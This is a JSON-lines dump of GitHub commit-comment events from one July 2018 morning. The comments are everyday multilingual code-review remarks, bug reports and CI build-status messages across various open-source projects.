{"id":"8026888697","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854593,"position":41,"line":29,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T06:55:46Z","updated_at":"2018-07-27T06:55:46Z","author_association":"NONE","body":"правильней сделать вместо \"кейса\" три отдельных метода\r\nи вызывать их отсюда с помощью вызова типа `send(method_name, argumetns)`\r\nв этом случае будет возможность добавлять в классы \"кастомные валидации\", которые так же легко можно будет вызывать с помощью этого функционала (главное соблюдать формат \"нейминга\")\r\nвариант же с \"кейсом\" очень негибкий, чтобы добавить валидацию нужно править код \"кейса\""}},"created_at":"2018-07-27T06:55:46Z"}
{"id":"8026889453","type":"CommitCommentEvent","actor":{"login":"hclivess"},"repo":{"name":"bakechain/bakechain"},"payload":{"comment":{"id":29854594,"position":null,"line":null,"path":null,"commit_id":"6eeed3091b3927b6148f10ecc858f0604a131851","created_at":"2018-07-27T06:55:58Z","updated_at":"2018-07-27T06:55:58Z","author_association":"NONE","body":"Hi, I am afraid the baker still stops randomly"}},"created_at":"2018-07-27T06:55:58Z"}
{"id":"8026894198","type":"CommitCommentEvent","actor":{"login":"holzerma"},"repo":{"name":"aposin/openinsuranceplatform"},"payload":{"comment":{"id":29854596,"position":null,"line":null,"path":null,"commit_id":"90761350249d2bc531480526f6669fa1c680ec18","created_at":"2018-07-27T06:57:21Z","updated_at":"2018-07-27T06:57:21Z","author_association":"CONTRIBUTOR","body":"for issue #2 "}},"created_at":"2018-07-27T06:57:21Z"}
{"id":"8026897953","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854599,"position":43,"line":31,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T06:58:24Z","updated_at":"2018-07-27T06:58:24Z","author_association":"NONE","body":"вот про этот код: `self.send(attr_name)`\r\nлучше отдельно получить значение переменной и далее уже передавать его в валидацию, т.е. чтобы в валидацию уже приходило именно значение\r\nесли нужно еще и имя аттрибута передать, значит надо передавать их как 2 отдельных аргумента"}},"created_at":"2018-07-27T06:58:24Z"}
{"id":"8026899253","type":"CommitCommentEvent","actor":{"login":"jponroy"},"repo":{"name":"15knots/cmake4eclipse"},"payload":{"comment":{"id":29854602,"position":null,"line":null,"path":null,"commit_id":"8680dc1c7c1fc9a81f175b0be0961dc337e61391","created_at":"2018-07-27T06:58:48Z","updated_at":"2018-07-27T06:58:48Z","author_association":"NONE","body":"tested in my side. Ok for me"}},"created_at":"2018-07-27T06:58:48Z"}
{"id":"8026899631","type":"CommitCommentEvent","actor":{"login":"gluons"},"repo":{"name":"gluons/vue-up"},"payload":{"comment":{"id":29854605,"position":null,"line":null,"path":null,"commit_id":"735736365b12fede73b135aa103827810cacab5a","created_at":"2018-07-27T06:58:55Z","updated_at":"2018-07-27T06:58:55Z","author_association":"OWNER","body":"Ops! **Rename** not **Remove** 😱 "}},"created_at":"2018-07-27T06:58:55Z"}
{"id":"8026902312","type":"CommitCommentEvent","actor":{"login":"cjbj"},"repo":{"name":"go-goracle/goracle"},"payload":{"comment":{"id":29854607,"position":75,"line":546,"path":"drv.go","commit_id":"554bb29a03b89e333e37565c74246e6c72023929","created_at":"2018-07-27T06:59:42Z","updated_at":"2018-07-27T06:59:42Z","author_association":"NONE","body":"An explicit option like standaloneConnection might be easier to search for and document etc?"}},"created_at":"2018-07-27T06:59:42Z"}
{"id":"8026906176","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29854619,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-27T07:00:42Z","updated_at":"2018-07-27T07:00:42Z","author_association":"NONE","body":"Через ```MySystem``` мы получаем доступ к ```myOut```, а через ```myOut``` - к ```myPrintln()```. Технически можно было перенести метод в ```MySystem``` и обращаться к нему через ```MySystem.myPrintln()```. Но в задании нужно было исследовать именно такую структуру, как у стандартного ```System.out.println()```, чтобы понимать, из каких элементов он состоит и как они записываются.\r\n\r\nДействительно, в стандартном системном классе такая структура, чтобы отделить In от Out и прочие составные части друг от друга. Вот тут обзор, из чего состоит [System](https://docs.oracle.com/javase/7/docs/api/java/lang/System.html). По сути этот класс несёт информацию о запущенной текущей программе: какие потоки ввода-вывод назначены ей, какие системные переменные связаны с ней и прочее"}},"created_at":"2018-07-27T07:00:42Z"}
{"id":"8026909406","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854631,"position":26,"line":19,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T07:01:36Z","updated_at":"2018-07-27T07:01:36Z","author_association":"NONE","body":"вот тут какая-то излишне сложная конструкция\r\nсмотри:\r\n```\r\n$ irb\r\n2.5.1 :001 > ar = [1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :002 > ar << 4\r\n => [1, 2, 3, 4] \r\n2.5.1 :003 > ar\r\n => [1, 2, 3, 4]\r\n```\r\nэлемент добавляется в массив без всяких присвоений\r\nи в связи с этим строки 14-16 видимо не нужны"}},"created_at":"2018-07-27T07:01:36Z"}
{"id":"8026915242","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854645,"position":43,"line":31,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T07:03:13Z","updated_at":"2018-07-27T07:03:13Z","author_association":"NONE","body":"где-то после 27 строки будет правильно добавить еще одну переменную - `value` и ее потом передавать"}},"created_at":"2018-07-27T07:03:13Z"}
{"id":"8026916644","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29854650,"position":12,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T07:03:37Z","updated_at":"2018-07-27T07:03:37Z","author_association":"MEMBER","body":"It is enough to call this once after the loop as in the previous version. "}},"created_at":"2018-07-27T07:03:37Z"}
{"id":"8026917178","type":"CommitCommentEvent","actor":{"login":"ipa-fog-ab"},"repo":{"name":"ipa-fog-ab/pointcloud_to_laserscan"},"payload":{"comment":{"id":29854651,"position":null,"line":null,"path":null,"commit_id":"4692d776b22462d18799c383734e22ff786d00be","created_at":"2018-07-27T07:03:46Z","updated_at":"2018-07-27T07:03:46Z","author_association":"OWNER","body":"create mirror image of input pointcloud and concatenate it with input point cloud using PCL"}},"created_at":"2018-07-27T07:03:46Z"}
{"id":"8026918398","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29854655,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T07:04:07Z","updated_at":"2018-07-27T07:04:07Z","author_association":"CONTRIBUTOR","body":"great, it works by revert the L2 cache changes.\r\npls fix."}},"created_at":"2018-07-27T07:04:07Z"}
{"id":"8026920496","type":"CommitCommentEvent","actor":{"login":"ipa-fog-ab"},"repo":{"name":"ipa-fog-ab/pointcloud_to_laserscan"},"payload":{"comment":{"id":29854667,"position":null,"line":null,"path":null,"commit_id":"4692d776b22462d18799c383734e22ff786d00be","created_at":"2018-07-27T07:04:43Z","updated_at":"2018-07-27T07:04:43Z","author_association":"OWNER","body":"create mirror image of input pointcloud and concatenate it with input point cloud using PCL"}},"created_at":"2018-07-27T07:04:43Z"}
{"id":"8026922444","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29854671,"position":6,"line":283,"path":"packages/compiler-cli/src/ngtsc/metadata/src/resolver.ts","commit_id":"ce7a14087e62650969b1f0a63cbeb62703ff8d1c","created_at":"2018-07-27T07:05:14Z","updated_at":"2018-07-27T07:05:14Z","author_association":"MEMBER","body":"Is it me or does `ts.FunctionExpression` appear twice? :eyes:"}},"created_at":"2018-07-27T07:05:14Z"}
{"id":"8026922963","type":"CommitCommentEvent","actor":{"login":"ipa-fog-ab"},"repo":{"name":"ipa-fog-ab/pointcloud_to_laserscan"},"payload":{"comment":{"id":29854672,"position":null,"line":null,"path":null,"commit_id":"a3cb5bc98b48558a252bab5a7a192d9941890589","created_at":"2018-07-27T07:05:23Z","updated_at":"2018-07-27T07:05:23Z","author_association":"OWNER","body":"included header files and edited function prototypes"}},"created_at":"2018-07-27T07:05:23Z"}
{"id":"8026922992","type":"CommitCommentEvent","actor":{"login":"codingjoe"},"repo":{"name":"applegrew/django-select2"},"payload":{"comment":{"id":29854673,"position":24,"line":77,"path":"django_select2/conf.py","commit_id":"1954bf57fafee0f27a7b444b1a468331ac2af9b3","created_at":"2018-07-27T07:05:23Z","updated_at":"2018-07-27T07:05:23Z","author_association":"COLLABORATOR","body":"hi @peterdemin I am sorry, but I won't revert this change. If you want to use an old version of Python, use an old version of this package. Please understand that I maintain this package in my free time. It is too much work to maintain all different Python versions.\r\n\r\nPlease also be aware that Python 3.4 EoL is approaching fast https://devguide.python.org/#status-of-python-branches\r\nPlease also be aware that Django is dropping support for 3.4 too."}},"created_at":"2018-07-27T07:05:23Z"}
{"id":"8026923315","type":"CommitCommentEvent","actor":{"login":"iniesta2014"},"repo":{"name":"hehonghui/android-tech-frontier"},"payload":{"comment":{"id":29854674,"position":null,"line":null,"path":null,"commit_id":"f3ca1c070f27189fc5fd8007b61a183ee3622677","created_at":"2018-07-27T07:05:29Z","updated_at":"2018-07-27T07:05:29Z","author_association":"NONE","body":"＃The App fix提到的解决方案，有一个坑。\r\nclickListener.clearOnDetach(dialog);\r\ndialog.show()；\r\n按照这种顺序，在Android N之前的版本（亲测L\\M）上会造成crash\r\n\"requestFeature() must be called before adding content\"\r\n需要先show再clearOnDetach。\r\n\r\n原因是在出问题的版本上，clearOnDetach方法中\r\ndialog.getWindow().getDecorView()会调用PhoneWindow.installDecor()，\r\n给mContentParent赋值，\r\n之后调用dialog.show()会调用到requestFeature()\r\nif (mContentParent != null) {\r\n            throw new AndroidRuntimeException(\"requestFeature() must be called before adding content\");\r\n }\r\n抛出异常，造成crash"}},"created_at":"2018-07-27T07:05:29Z"}
{"id":"8026925788","type":"CommitCommentEvent","actor":{"login":"704480904"},"repo":{"name":"Rance935/ChatUI"},"payload":{"comment":{"id":29854680,"position":null,"line":null,"path":null,"commit_id":"8f0d592f56e4158cb4fa763be630fc84355960b1","created_at":"2018-07-27T07:06:09Z","updated_at":"2018-07-27T07:06:09Z","author_association":"NONE","body":"好像发送的文字越来越长之后  会出现聊天气泡变得很高 中间空了很多内容"}},"created_at":"2018-07-27T07:06:09Z"}
{"id":"8026927981","type":"CommitCommentEvent","actor":{"login":"miura"},"repo":{"name":"imagej/imagej-legacy"},"payload":{"comment":{"id":29854690,"position":null,"line":null,"path":null,"commit_id":"a41581e4a5e989a532d67027346e021cc71249ae","created_at":"2018-07-27T07:06:42Z","updated_at":"2018-07-27T07:06:42Z","author_association":"MEMBER","body":"thanks!"}},"created_at":"2018-07-27T07:06:42Z"}
{"id":"8026931356","type":"CommitCommentEvent","actor":{"login":"blogic"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29854700,"position":39,"line":32,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T07:07:38Z","updated_at":"2018-07-27T07:07:38Z","author_association":"CONTRIBUTOR","body":"ok, will investigate, Thanks  for the fast testing !"}},"created_at":"2018-07-27T07:07:38Z"}
{"id":"8026931637","type":"CommitCommentEvent","actor":{"login":"ptpt52"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29854701,"position":9,"line":6,"path":"target/linux/ipq40xx/patches-4.14/071-qcom-ipq4019-use-v2-of-the-kpss-bringup-mechanism.patch","commit_id":"95672e04335ea0d7d8f468cec8f63d593cc6ede6","created_at":"2018-07-27T07:07:43Z","updated_at":"2018-07-27T07:07:43Z","author_association":"CONTRIBUTOR","body":"I paste the patch here: https://gist.github.com/ptpt52/a550f16b34a77f04bc2f1ad5b25fc4b0"}},"created_at":"2018-07-27T07:07:43Z"}
{"id":"8026933604","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29854704,"position":39,"line":27,"path":"lesson8/validation.rb","commit_id":"b6e946bcbd13e35de4d3375e7496840c60d212ab","created_at":"2018-07-27T07:08:15Z","updated_at":"2018-07-27T07:08:15Z","author_association":"NONE","body":"лучше в 19 строке сразу разбирать на составляющие `params` и добавлять в переменну ю `validations` не массив, а хеш\r\nтогда здесь будет прозрачное и понятное обращение к ключам, вместо получения значений по индексам\r\nтипа:\r\n```ruby\r\nattr_name = validation[:name]\r\n```\r\nили вообще можно будет здесь убрать этот промежуточный момент с инициализацией переменных и сразу работать с ключами хеша, т.е. в валидации обращаться вот так: `validation[:name]`, `validation[:type]` "}},"created_at":"2018-07-27T07:08:15Z"}
{"id":"8026936447","type":"CommitCommentEvent","actor":{"login":"smdfzeal"},"repo":{"name":"smdfzeal/self-study"},"payload":{"comment":{"id":29854708,"position":null,"line":null,"path":null,"commit_id":"e5915416e3e57d52ccc511cfbc0c7c867c1acbd8","created_at":"2018-07-27T07:09:03Z","updated_at":"2018-07-27T07:09:03Z","author_association":"OWNER","body":"looks good"}},"created_at":"2018-07-27T07:09:03Z"}
{"id":"8026937640","type":"CommitCommentEvent","actor":{"login":"bhaveshk023"},"repo":{"name":"MCUdude/MiniCore"},"payload":{"comment":{"id":29854711,"position":null,"line":null,"path":null,"commit_id":"6df3c04fbeb4164dbe2932c33eff4b864ed1257e","created_at":"2018-07-27T07:09:22Z","updated_at":"2018-07-27T07:09:22Z","author_association":"NONE","body":"how to add atmega88PB keywords??"}},"created_at":"2018-07-27T07:09:22Z"}
{"id":"8026940544","type":"CommitCommentEvent","actor":{"login":"bhaveshk023"},"repo":{"name":"MCUdude/MiniCore"},"payload":{"comment":{"id":29854713,"position":null,"line":null,"path":null,"commit_id":"6df3c04fbeb4164dbe2932c33eff4b864ed1257e","created_at":"2018-07-27T07:10:11Z","updated_at":"2018-07-27T07:10:11Z","author_association":"NONE","body":"not able to use the keywors provided in the list for atmega88PB , it is not working in arduino ide"}},"created_at":"2018-07-27T07:10:11Z"}
{"id":"8026941085","type":"CommitCommentEvent","actor":{"login":"brother-fu"},"repo":{"name":"sameersbn/docker-redmine"},"payload":{"comment":{"id":29854714,"position":null,"line":null,"path":null,"commit_id":"a573cc0561b1a7077e05d6a707a24115a1e4764f","created_at":"2018-07-27T07:10:19Z","updated_at":"2018-07-27T07:10:19Z","author_association":"NONE","body":"should be 5.7.22-1"}},"created_at":"2018-07-27T07:10:19Z"}
{"id":"8026944290","type":"CommitCommentEvent","actor":{"login":"Linpeizhen"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29854715,"position":8,"line":9,"path":"src/views/animation.html","commit_id":"99d3a6a3c10dd17e8011402f4b719182b393ef90","created_at":"2018-07-27T07:11:12Z","updated_at":"2018-07-27T07:11:12Z","author_association":"NONE","body":"好深奧\r\n"}},"created_at":"2018-07-27T07:11:12Z"}
{"id":"8026945106","type":"CommitCommentEvent","actor":{"login":"Linpeizhen"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29854716,"position":6,"line":10,"path":"src/sass/page_pay.scss","commit_id":"99d3a6a3c10dd17e8011402f4b719182b393ef90","created_at":"2018-07-27T07:11:24Z","updated_at":"2018-07-27T07:11:24Z","author_association":"NONE","body":"👌🏻"}},"created_at":"2018-07-27T07:11:24Z"}
{"id":"8026946560","type":"CommitCommentEvent","actor":{"login":"Linpeizhen"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29854717,"position":46,"line":90,"path":"src/sass/_card.scss","commit_id":"92b12d37064f173fa790ec64ac8b41338998d90f","created_at":"2018-07-27T07:11:49Z","updated_at":"2018-07-27T07:11:49Z","author_association":"NONE","body":"👌🏻\r\n"}},"created_at":"2018-07-27T07:11:49Z"}
{"id":"8026960719","type":"CommitCommentEvent","actor":{"login":"danieldietsch"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29854753,"position":null,"line":null,"path":null,"commit_id":"a6b7e2af56c2a526166dd60ba1f0b6e912df6999","created_at":"2018-07-27T07:15:37Z","updated_at":"2018-07-27T07:15:37Z","author_association":"MEMBER","body":"@Heizmann : Check if this is what you intended. It fixes the build, but I do not know anything about its effects. "}},"created_at":"2018-07-27T07:15:37Z"}
{"id":"8026964009","type":"CommitCommentEvent","actor":{"login":"Madalosso"},"repo":{"name":"mcbattirola/gerador_calendario_matricula"},"payload":{"comment":{"id":29854767,"position":1,"line":1,"path":".gitignore","commit_id":"193374502f804262fc64bdc1611d03fd61a33ca7","created_at":"2018-07-27T07:16:25Z","updated_at":"2018-07-27T07:16:25Z","author_association":"COLLABORATOR","body":"gitignore declara regras para ignorar arquivos no diretorio no qual trabalhamos que não devem ser enviados ao repositório. (https://git-scm.com/docs/gitignore)"}},"created_at":"2018-07-27T07:16:25Z"}
{"id":"8026964656","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854768,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-27T07:16:36Z","updated_at":"2018-07-27T07:16:36Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2986 of 2986 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T07:16:36Z"}
{"id":"8026966023","type":"CommitCommentEvent","actor":{"login":"tianyin"},"repo":{"name":"tianyin/tianyin.github.io"},"payload":{"comment":{"id":29854769,"position":null,"line":null,"path":null,"commit_id":"8da6d0195966b4974ced33dfaa133892224178fa","created_at":"2018-07-27T07:16:56Z","updated_at":"2018-07-27T07:16:56Z","author_association":"OWNER","body":"wonderful, \r\ncai geng xiang"}},"created_at":"2018-07-27T07:16:56Z"}
{"id":"8026967854","type":"CommitCommentEvent","actor":{"login":"Alekhya432"},"repo":{"name":"Alekhya432/ALEKHYA"},"payload":{"comment":{"id":29854771,"position":null,"line":null,"path":null,"commit_id":"a457b0fc15bf698e39d0645e8eca09f706439b27","created_at":"2018-07-27T07:17:23Z","updated_at":"2018-07-27T07:17:23Z","author_association":"OWNER","body":"print(\"hello\")"}},"created_at":"2018-07-27T07:17:23Z"}
{"id":"8026968395","type":"CommitCommentEvent","actor":{"login":"saikrishna69"},"repo":{"name":"saikrishna69/firstrepo"},"payload":{"comment":{"id":29854773,"position":null,"line":null,"path":null,"commit_id":"5086ea0f97bcff288641ddb65b9cf192b81f2823","created_at":"2018-07-27T07:17:31Z","updated_at":"2018-07-27T07:17:31Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-27T07:17:31Z"}
{"id":"8026970386","type":"CommitCommentEvent","actor":{"login":"Madalosso"},"repo":{"name":"mcbattirola/gerador_calendario_matricula"},"payload":{"comment":{"id":29854775,"position":2,"line":1,"path":"get_data_ufrgs.py","commit_id":"193374502f804262fc64bdc1611d03fd61a33ca7","created_at":"2018-07-27T07:17:59Z","updated_at":"2018-07-27T07:17:59Z","author_association":"COLLABORATOR","body":"Não sei se é por conta do SO ou do interpretador python...\r\nEu preciso adicionar essa linha de comentário pra não gerar problemas na execução no meu ambiente.\r\nEnfim, essa linha permite rodar o código contento acentuação na minha máquina =)"}},"created_at":"2018-07-27T07:17:59Z"}
{"id":"8026971042","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29854778,"position":null,"line":null,"path":null,"commit_id":"408d94d65fba0236c2ef2b0a98518d82918e4f63","created_at":"2018-07-27T07:18:09Z","updated_at":"2018-07-27T07:18:09Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 53](https://teamcity.otenv.com/viewLog.html?buildId=9015264&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 48, ignored: 6 Build time: 00:17:59"}},"created_at":"2018-07-27T07:18:09Z"}
{"id":"8026971673","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29854779,"position":null,"line":null,"path":null,"commit_id":"0e2038db4d10baf0318ca31d77d6a29b34ce8f8f","created_at":"2018-07-27T07:18:17Z","updated_at":"2018-07-27T07:18:17Z","author_association":"COLLABORATOR","body":"`<string name=\"beauty_fragment_tab_name_3d_makeup\">Schminke</string>`\r\nBitte Makeup nicht mit Schminke übersetzen, Makeup bleibt auch im Deutschen Makup 😳.\r\nBitte string wieder löschen. Danke schön 😉"}},"created_at":"2018-07-27T07:18:17Z"}
{"id":"8026974822","type":"CommitCommentEvent","actor":{"login":"Madalosso"},"repo":{"name":"mcbattirola/gerador_calendario_matricula"},"payload":{"comment":{"id":29854781,"position":52,"line":60,"path":"get_data_ufrgs.py","commit_id":"193374502f804262fc64bdc1611d03fd61a33ca7","created_at":"2018-07-27T07:19:04Z","updated_at":"2018-07-27T07:19:04Z","author_association":"COLLABORATOR","body":"pequena mudança pra chegarmos no path correto independente do SO utilizado.\r\n\r\n"}},"created_at":"2018-07-27T07:19:04Z"}
{"id":"8026977567","type":"CommitCommentEvent","actor":{"login":"Ameobea"},"repo":{"name":"luizirber/wort-dnd"},"payload":{"comment":{"id":29854785,"position":null,"line":null,"path":null,"commit_id":"fe840e1bc37abd46a63b71d9a5e1de627be3d912","created_at":"2018-07-27T07:19:46Z","updated_at":"2018-07-27T07:19:46Z","author_association":"NONE","body":"Ooh - I didn't know you could include NPM dependencies directly from git like that!  We have the same problem, and this commit showed up on the WebPack PR since you mentioned it.  Thanks for the fix! :D"}},"created_at":"2018-07-27T07:19:46Z"}
{"id":"8026983219","type":"CommitCommentEvent","actor":{"login":"jasonejavier"},"repo":{"name":"tanjarce/foooods"},"payload":{"comment":{"id":29854799,"position":null,"line":null,"path":null,"commit_id":"d30ae7cda2f4b87c9904b227ceb2652d7f751e8d","created_at":"2018-07-27T07:21:13Z","updated_at":"2018-07-27T07:21:13Z","author_association":"COLLABORATOR","body":"jjk"}},"created_at":"2018-07-27T07:21:13Z"}
{"id":"8026983480","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854800,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-27T07:21:17Z","updated_at":"2018-07-27T07:21:17Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T07:21:17Z"}
{"id":"8026983654","type":"CommitCommentEvent","actor":{"login":"desawarna"},"repo":{"name":"slims/slims8_akasia"},"payload":{"comment":{"id":29854805,"position":27,"line":127,"path":"install/check_system.php","commit_id":"631f6b9a926bc2d72b23f06d4bcccc9d387b391c","created_at":"2018-07-27T07:21:20Z","updated_at":"2018-07-27T07:21:20Z","author_association":"NONE","body":"Tanya tentang Git :) \r\nkalau yang merah itu baris code dihapus ya?\r\n\r\ntrus kalau yang hijau itu penambahan baris code baru ?\r\n\r\nTerima kasih  Mas @heroesoebekti "}},"created_at":"2018-07-27T07:21:20Z"}
{"id":"8026984737","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29854808,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T07:21:37Z","updated_at":"2018-07-27T07:21:37Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2948 tests passed, 11 test warnings)\n\nMessages:\n\n * 26 tests had: EIO diffs.\n * 13 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 10 tests had: Table small diffs.\n * 3 tests had: ERR diffs.\n * 13 tests had: ESO big diffs.\n * 14 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 608\n * Failed: 15\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.49%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T07:21:37Z"}
{"id":"8026988342","type":"CommitCommentEvent","actor":{"login":"ArekJanik"},"repo":{"name":"Selleo/website"},"payload":{"comment":{"id":29854814,"position":null,"line":null,"path":null,"commit_id":"5b29d39f4495e295b731a40c5e9a27f4945eb594","created_at":"2018-07-27T07:22:31Z","updated_at":"2018-07-27T07:22:31Z","author_association":"CONTRIBUTOR","body":"@tb looks goos 👍 "}},"created_at":"2018-07-27T07:22:31Z"}
{"id":"8026991761","type":"CommitCommentEvent","actor":{"login":"megaxlr"},"repo":{"name":"KABBOUCHI/laravel-logger-discord-channel"},"payload":{"comment":{"id":29854823,"position":6,"line":21,"path":"README.md","commit_id":"dd9cf2c67bb70e60a668e956951bfa1812246cfb","created_at":"2018-07-27T07:23:26Z","updated_at":"2018-07-27T07:23:26Z","author_association":"CONTRIBUTOR","body":"Pretty sure it's not checking here in the Handler [src/DiscordHandler.php#L61](https://github.com/KABBOUCHI/laravel-logger-discord-channel/blob/67d1979070eb2278833f7a58a73047532b2bd692/src/DiscordHandler.php#L61)"}},"created_at":"2018-07-27T07:23:26Z"}
{"id":"8026995171","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29854828,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T07:24:20Z","updated_at":"2018-07-27T07:24:20Z","author_association":"OWNER","body":"size(300, 300);\r\nbackground(255);\r\nstroke(255);\r\n\r\nfill(255,0,0); \r\nfor(int d=0;d<5;d++){  //0~4\r\n  ellipse(20 + d * 30, 50, 25, 25);\r\n}\r\n"}},"created_at":"2018-07-27T07:24:20Z"}
{"id":"8027014863","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29854861,"position":null,"line":null,"path":null,"commit_id":"305a0ddb484acc65e99bb6337c60fba001bae6bc","created_at":"2018-07-27T07:29:25Z","updated_at":"2018-07-27T07:29:25Z","author_association":"COLLABORATOR","body":"ok, there are indeed translation issues, even in spanish, will patch what I can find\r\n![screen shot 2018-07-27 at 1 26 15 am](https://user-images.githubusercontent.com/163977/43307766-7b2a712c-913c-11e8-9372-373aec27db53.png)\r\n"}},"created_at":"2018-07-27T07:29:25Z"}
{"id":"8027017454","type":"CommitCommentEvent","actor":{"login":"epkjlyyfzx"},"repo":{"name":"vuejs/vuex"},"payload":{"comment":{"id":29854873,"position":null,"line":null,"path":null,"commit_id":"fe5f25215fee2288a8896ff4dbcfff5fe166d8fc","created_at":"2018-07-27T07:30:06Z","updated_at":"2018-07-27T07:30:06Z","author_association":"NONE","body":"666"}},"created_at":"2018-07-27T07:30:06Z"}
